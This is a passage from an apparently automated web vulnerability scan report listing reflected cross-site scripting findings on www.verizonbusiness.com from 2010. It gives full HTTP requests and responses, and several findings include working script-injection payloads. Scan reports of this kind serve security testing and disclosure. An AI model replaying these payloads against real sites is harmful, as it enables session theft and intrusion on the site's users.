<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/pt25def';5568cd217f2/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.551. http://www.verizonbusiness.com/resources/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 13e62'%3b7a1a1606011 was submitted in the REST URL parameter 1. This input was echoed as 13e62';7a1a1606011 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources13e62'%3b7a1a1606011/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:04:31 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40618
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:04:31 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:04:31 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/resources13e62';7a1a1606011/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.552. http://www.verizonbusiness.com/resources/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 437b5"%3b3c1819f3a01 was submitted in the REST URL parameter 1. This input was echoed as 437b5";3c1819f3a01 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources437b5"%3b3c1819f3a01/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:04:13 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 40618
Date: Wed, 17 Nov 2010 00:04:13 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:04:13 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources437b5";3c1819f3a01/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.553. http://www.verizonbusiness.com/resources/1002a1a2-111-Healthcare.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a1a2-111-Healthcare.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ac72d'%3b34f9ca1396e was submitted in the REST URL parameter 1. This input was echoed as ac72d';34f9ca1396e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resourcesac72d'%3b34f9ca1396e/1002a1a2-111-Healthcare.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:19:41 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40656
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:19:41 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:19:41 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/resourcesac72d';34f9ca1396e/1002a1a2-111-Healthcare.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.554. http://www.verizonbusiness.com/resources/1002a1a2-111-Healthcare.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a1a2-111-Healthcare.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e921e"%3b45eba8308f0 was submitted in the REST URL parameter 1. This input was echoed as e921e";45eba8308f0 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resourcese921e"%3b45eba8308f0/1002a1a2-111-Healthcare.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:19:25 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40654
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:19:25 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:19:25 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resourcese921e";45eba8308f0/1002a1a2-111-Healthcare.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEME
...[SNIP]...

1.555. http://www.verizonbusiness.com/resources/1002a1a2-111-Healthcare.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a1a2-111-Healthcare.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 95b56'%3b992e6143e2e was submitted in the REST URL parameter 2. This input was echoed as 95b56';992e6143e2e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/95b56'%3b992e6143e2e HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:21:55 GMT
Content-Type: text/html
Content-Length: 40210
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:21:55 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:21:55 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources/95b56';992e6143e2e'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.556. http://www.verizonbusiness.com/resources/1002a1a2-111-Healthcare.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a1a2-111-Healthcare.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 82e1e</script><script>alert(1)</script>f041dbfc7ba was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/1002a1a2-111-Healthcare.xml82e1e</script><script>alert(1)</script>f041dbfc7ba HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 200 OK
Server: Roxen/4.5.146-release3
ETag: "4eeb2625c4af4591108893450e729612"
Last-Modified: Wed, 17 Nov 2010 00:21:48 GMT
Content-Type: text/html; charset=ISO-8859-1
Vary: User-Agent
Date: Wed, 17 Nov 2010 00:21:49 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: BERT=VRID%3da5ef3f9f-9afb-4bac-820d-476452b591f8|VTID%3df2facbeb-66be-411f-89e9-1a3cb1c78d59|SX%3d1289954508|VP%3d1|RMC%3dxg|LP%3den; expires=Tue, 17 Nov 2015 05:25:32 GMT; domain=www.verizonbusiness.com; path=/
Expires: Mon, 16 Nov 2009 18:21:48 GMT
Content-Length: 43585

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<url>/resources/1002a1a2-111-Healthcare.xml82e1e</script><script>alert(1)</script>f041dbfc7ba</url>
...[SNIP]...

1.557. http://www.verizonbusiness.com/resources/1002a1a3-111-Financial.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a1a3-111-Financial.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5ab36"%3b068213b8fe2 was submitted in the REST URL parameter 1. This input was echoed as 5ab36";068213b8fe2 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources5ab36"%3b068213b8fe2/1002a1a3-111-Financial.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:19:03 GMT
Content-Type: text/html
Content-Length: 40652
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:19:03 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:19:03 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources5ab36";068213b8fe2/1002a1a3-111-Financial.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMEN
...[SNIP]...

1.558. http://www.verizonbusiness.com/resources/1002a1a3-111-Financial.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a1a3-111-Financial.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1e088'%3b2ca1ff37447 was submitted in the REST URL parameter 1. This input was echoed as 1e088';2ca1ff37447 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources1e088'%3b2ca1ff37447/1002a1a3-111-Financial.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:19:24 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 40652
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:19:24 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:19:24 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources1e088';2ca1ff37447/1002a1a3-111-Financial.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.559. http://www.verizonbusiness.com/resources/1002a1a3-111-Financial.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a1a3-111-Financial.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 89ba5'%3b4290e890be9 was submitted in the REST URL parameter 2. This input was echoed as 89ba5';4290e890be9 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/89ba5'%3b4290e890be9 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:21:58 GMT
Content-Type: text/html
Content-Length: 40212
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:21:58 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:21:58 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources/89ba5';4290e890be9'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.560. http://www.verizonbusiness.com/resources/1002a1a3-111-Financial.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a1a3-111-Financial.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2c021</script><script>alert(1)</script>2f887a43aad was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/1002a1a3-111-Financial.xml2c021</script><script>alert(1)</script>2f887a43aad HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 200 OK
Server: Roxen/4.5.146-release3
ETag: "63fcca76b10c3920734d22c136ea71e0"
Last-Modified: Wed, 17 Nov 2010 00:21:55 GMT
Content-Type: text/html; charset=ISO-8859-1
Vary: User-Agent
Date: Wed, 17 Nov 2010 00:21:56 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: BERT=VRID%3dc1619485-baef-4611-8a4e-f05e8624cddd|VTID%3d5070fc18-a93e-4d4c-8aeb-7150437e3159|SX%3d1289954515|VP%3d1|RMC%3dxg|LP%3den; expires=Tue, 17 Nov 2015 05:25:39 GMT; domain=www.verizonbusiness.com; path=/
Expires: Mon, 16 Nov 2009 18:21:55 GMT
Content-Length: 38257

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<url>/resources/1002a1a3-111-Financial.xml2c021</script><script>alert(1)</script>2f887a43aad</url>
...[SNIP]...

1.561. http://www.verizonbusiness.com/resources/1002a1a4-111-Education.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a1a4-111-Education.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 61150'%3bc74d7dead61 was submitted in the REST URL parameter 1. This input was echoed as 61150';c74d7dead61 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources61150'%3bc74d7dead61/1002a1a4-111-Education.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:17:57 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 40652
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:17:58 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:17:57 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources61150';c74d7dead61/1002a1a4-111-Education.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.562. http://www.verizonbusiness.com/resources/1002a1a4-111-Education.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a1a4-111-Education.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f0a24"%3b3f5a4a4a495 was submitted in the REST URL parameter 1. This input was echoed as f0a24";3f5a4a4a495 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resourcesf0a24"%3b3f5a4a4a495/1002a1a4-111-Education.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:17:49 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Content-Type: text/html
Content-Length: 40652
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:17:50 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:17:49 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css" type="text/css"><link med
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resourcesf0a24";3f5a4a4a495/1002a1a4-111-Education.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMEN
...[SNIP]...

1.563. http://www.verizonbusiness.com/resources/1002a1a4-111-Education.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a1a4-111-Education.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 638b2</script><script>alert(1)</script>930eacbee47 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/1002a1a4-111-Education.xml638b2</script><script>alert(1)</script>930eacbee47 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 200 OK
Server: Roxen/4.5.146-release3
ETag: "c7894ffaf366beb4034b36f63dbe793f"
Last-Modified: Wed, 17 Nov 2010 00:18:56 GMT
Content-Type: text/html; charset=ISO-8859-1
Vary: User-Agent
Date: Wed, 17 Nov 2010 00:18:56 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: BERT=VRID%3dc142cd0a-f8a4-45bf-8704-ed4a9f90e1eb|VTID%3dc6f5e5b6-9f1c-48f3-9d4f-93fd24531a4a|SX%3d1289954336|VP%3d1|RMC%3dxg|LP%3den; expires=Tue, 17 Nov 2015 05:22:40 GMT; domain=www.verizonbusiness.com; path=/
Expires: Mon, 16 Nov 2009 18:18:56 GMT
Content-Length: 40880

